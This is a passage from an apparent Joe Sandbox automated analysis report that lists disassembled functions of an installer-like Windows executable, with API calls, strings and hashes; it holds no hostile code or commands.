                                                                                                                                                                      • Instruction Fuzzy Hash: 7101D43520C3806AE600A63D8C85A9F6BDD9FC6314F05446EF484DB282C979C801C761
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042E92C Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E94E
                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E979
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E986
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E98E
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E994
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1177325624-0
                                                                                                                                                                      • Opcode ID: 0ee6c97240dbc0949eb88849e593f219cfc62bfe26a28d17ac5b9a80884b17e6
                                                                                                                                                                      • Instruction ID: 3f40d390e8a5df174f84cdc2f44e01f6cfa8788c97922530efddc0b1fccee370
                                                                                                                                                                      • Opcode Fuzzy Hash: 0ee6c97240dbc0949eb88849e593f219cfc62bfe26a28d17ac5b9a80884b17e6
                                                                                                                                                                      • Instruction Fuzzy Hash: 31F0CDB23A17207AF520717A5C86F6B018CC789B68F10823BBB04FF1C1E9A85D0545AD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0046B930 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 320COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      • PrepareToInstall failed: %s, xrefs: 0046BC8E
                                                                                                                                                                      • Need to restart Windows? %s, xrefs: 0046BCB5
                                                                                                                                                                      • NextButtonClick, xrefs: 0046BA6C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                                                                                                      • API String ID: 0-2329492092
                                                                                                                                                                      • Opcode ID: 8f88e5a9d7d4d763b115877c8190cf7d5f0bd6827876ee7d1e7c79d18a61c1cb
                                                                                                                                                                      • Instruction ID: ef605359146084d2a330ce9392c81193c54d44d6395a219c566c339d74a55226
                                                                                                                                                                      • Opcode Fuzzy Hash: 8f88e5a9d7d4d763b115877c8190cf7d5f0bd6827876ee7d1e7c79d18a61c1cb
                                                                                                                                                                      • Instruction Fuzzy Hash: F6D12A34A04108DFCB10EF99D585AEE77F5EF49304F6444BAE400AB352D778AE81CB9A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00482648 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 224COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetActiveWindow.USER32(?,?,00000000,00482990), ref: 0048276C
                                                                                                                                                                      • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482801
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ActiveChangeNotifyWindow
                                                                                                                                                                      • String ID: $Need to restart Windows? %s
                                                                                                                                                                      • API String ID: 1160245247-4200181552
                                                                                                                                                                      • Opcode ID: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                                                                                                                                      • Instruction ID: d92f6dc0c394a11860c555715cc1377d1ab7d31dc5c27e132739ea4afdffe6c1
                                                                                                                                                                      • Opcode Fuzzy Hash: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5291A274A042049FDB10FB69D986BAD77F4AF55308F1084BBE8009B362D7B86D05CB5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00424CD8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041F06C: GetActiveWindow.USER32 ref: 0041F06F
                                                                                                                                                                        • Part of subcall function 0041F06C: GetCurrentThreadId.KERNEL32 ref: 0041F084
                                                                                                                                                                        • Part of subcall function 0041F06C: 74075A40.USER32(00000000,Function_0001F048), ref: 0041F08A
                                                                                                                                                                        • Part of subcall function 004231A0: GetSystemMetrics.USER32(00000000), ref: 004231A2
                                                                                                                                                                      • OffsetRect.USER32(?,?,?), ref: 00424DC1
                                                                                                                                                                      • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E84
                                                                                                                                                                      • OffsetRect.USER32(?,?,?), ref: 00424E95
                                                                                                                                                                        • Part of subcall function 0042355C: GetCurrentThreadId.KERNEL32 ref: 00423571
                                                                                                                                                                        • Part of subcall function 0042355C: SetWindowsHookExA.USER32(00000003,00423518,00000000,00000000), ref: 00423581
                                                                                                                                                                        • Part of subcall function 0042355C: CreateThread.KERNEL32(00000000,000003E8,004234C8,00000000,00000000), ref: 004235A5
                                                                                                                                                                        • Part of subcall function 00424B24: SetTimer.USER32(00000000,00000001,?,004234AC), ref: 00424B3F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$CurrentOffsetRect$74075ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                                                                                                                                      • String ID: nLB
                                                                                                                                                                      • API String ID: 2265292750-2031493005
                                                                                                                                                                      • Opcode ID: 4428afb6cf25abe99f0fde85bdc7744805a8d86aaadab1c3ab3badaca91d7ff0
                                                                                                                                                                      • Instruction ID: 6ccba84303d4583ac65c185f09da03f8435108134aba783506c2f58cc8f90ba1
                                                                                                                                                                      • Opcode Fuzzy Hash: 4428afb6cf25abe99f0fde85bdc7744805a8d86aaadab1c3ab3badaca91d7ff0
                                                                                                                                                                      • Instruction Fuzzy Hash: A7812871A00218CFDB14DFA8D884ADEBBF4FF88314F51416AE905AB296E778AD45CF44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0046F8FC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,0046FAF9,?,?,0049C1D0,00000000), ref: 0046F9D6
                                                                                                                                                                      • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FA50
                                                                                                                                                                      • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FA75
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                                                                                      • String ID: Creating directory: %s
                                                                                                                                                                      • API String ID: 2451617938-483064649
                                                                                                                                                                      • Opcode ID: f90f6b38db375b32fca17f1f19ab67da613558bdfb0796102130732e5bc04e6e
                                                                                                                                                                      • Instruction ID: 2bd83b05653ced0f0f619092410e1b81403e7cd9e02354fb4b3544f6b0b1216d
                                                                                                                                                                      • Opcode Fuzzy Hash: f90f6b38db375b32fca17f1f19ab67da613558bdfb0796102130732e5bc04e6e
                                                                                                                                                                      • Instruction Fuzzy Hash: 0F512174E00248ABDB01DFE9D582BDEBBF5AF48304F50847AE844B7396D7785E088B59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00406F94 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406FF3
                                                                                                                                                                      • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040706D
                                                                                                                                                                      • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070C5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Enum$NameOpenResourceUniversal
                                                                                                                                                                      • String ID: Z
                                                                                                                                                                      • API String ID: 3604996873-1505515367
                                                                                                                                                                      • Opcode ID: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                                                                                                                                      • Instruction ID: 6c201072c7e19ab920663406aa1001a3a7646b20d706545eb94c2f0a958ae389
                                                                                                                                                                      • Opcode Fuzzy Hash: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                                                                                                                                      • Instruction Fuzzy Hash: 17517070E04208ABDB11DF55C941A9EBBF9EF49304F1481BAE500BB3D1D778AE458B6A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0044CFB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetRectEmpty.USER32(?), ref: 0044D046
                                                                                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D071
                                                                                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D0F9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DrawText$EmptyRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 182455014-2867612384
                                                                                                                                                                      • Opcode ID: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                                                                                                                                      • Instruction ID: 2c01bf535b7fc2f64207dbeae616ffe24efc4250a83762b1f7dac36c1304b9fc
                                                                                                                                                                      • Opcode Fuzzy Hash: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C517171E00248AFDB11DFA9C885BDEBBF8AF49308F14447AE845EB352D7389945CB64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042EF6C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • 7406A670.USER32(00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EF96
                                                                                                                                                                        • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0042EFB9
                                                                                                                                                                      • 7406A580.USER32(00000000,?,0042F0A5,00000000,0042F09E,?,00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000), ref: 0042F098
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 7406$A580A670CreateFontIndirectObjectSelect
                                                                                                                                                                      • String ID: ...\
                                                                                                                                                                      • API String ID: 73379201-983595016
                                                                                                                                                                      • Opcode ID: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                                                                                                                                      • Instruction ID: 43f07ddd406d3cd78f52d868909731211d08e22d210600ca561f601472f043fe
                                                                                                                                                                      • Opcode Fuzzy Hash: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                                                                                                                                      • Instruction Fuzzy Hash: A6318570B00128ABDB11DF99D841BAEB7F9FB48708F90447BF410A7392C7785E44CA59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00454DA8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E56
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F1C), ref: 00454EC0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressByteCharMultiProcWide
                                                                                                                                                                      • String ID: SfcIsFileProtected$sfc.dll
                                                                                                                                                                      • API String ID: 2508298434-591603554
                                                                                                                                                                      • Opcode ID: 3f4a3df1b5b9a86f0bfd358535b50ffd6d6363df8211cf491cfd4812b6f90ceb
                                                                                                                                                                      • Instruction ID: 176d29f9623cbc30a6d26dfc77e51d4098360506d5c3757ea1f9e8bf8263b863
                                                                                                                                                                      • Opcode Fuzzy Hash: 3f4a3df1b5b9a86f0bfd358535b50ffd6d6363df8211cf491cfd4812b6f90ceb
                                                                                                                                                                      • Instruction Fuzzy Hash: 21416670A04218ABE720EB55DC86B9E77B8EB44309F5041B7E908A7293D7785F89CF5C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00416408 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                                                                                                                                      • UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                                                                                                                                      • RegisterClassA.USER32(?), ref: 004164C6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Class$InfoRegisterUnregister
                                                                                                                                                                      • String ID: @
                                                                                                                                                                      • API String ID: 3749476976-2766056989
                                                                                                                                                                      • Opcode ID: 82a3142196a62dd30f3f4872003414a1c2a16ad0217d9a3e7b6886cdbb80be57
                                                                                                                                                                      • Instruction ID: 9d11af1acff112dbe95f15f3a9399eab9f365f4a7252c57533c35fba51c14aa0
                                                                                                                                                                      • Opcode Fuzzy Hash: 82a3142196a62dd30f3f4872003414a1c2a16ad0217d9a3e7b6886cdbb80be57
                                                                                                                                                                      • Instruction Fuzzy Hash: 81316F702043409BD720EF68C981B9B77E5AB89308F04457FF949DB392DB39D944CB6A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0049771C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 0049778C
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 004977B5
                                                                                                                                                                      • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004977CE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Attributes$Move
                                                                                                                                                                      • String ID: isRS-%.3u.tmp
                                                                                                                                                                      • API String ID: 3839737484-3657609586
                                                                                                                                                                      • Opcode ID: 5f98eb2ef861731ca920118b27b6b17a083a99cdcef5561a2da8a7d5e1907bb0
                                                                                                                                                                      • Instruction ID: cfa846df06bac921d3cc7342383d8013e9ea743293dbac669405f5124aadd281
                                                                                                                                                                      • Opcode Fuzzy Hash: 5f98eb2ef861731ca920118b27b6b17a083a99cdcef5561a2da8a7d5e1907bb0
                                                                                                                                                                      • Instruction Fuzzy Hash: 05213271E14209AFCF00EBA9C8859AFBBB8AF54314F51457AB414B72D1D6385E01CB59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExitMessageProcess
                                                                                                                                                                      • String ID: Error$Runtime error at 00000000
                                                                                                                                                                      • API String ID: 1220098344-2970929446
                                                                                                                                                                      • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                                                                                      • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                                                                                                      • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                                                                                      • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00456A1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                                                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                                      • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A70
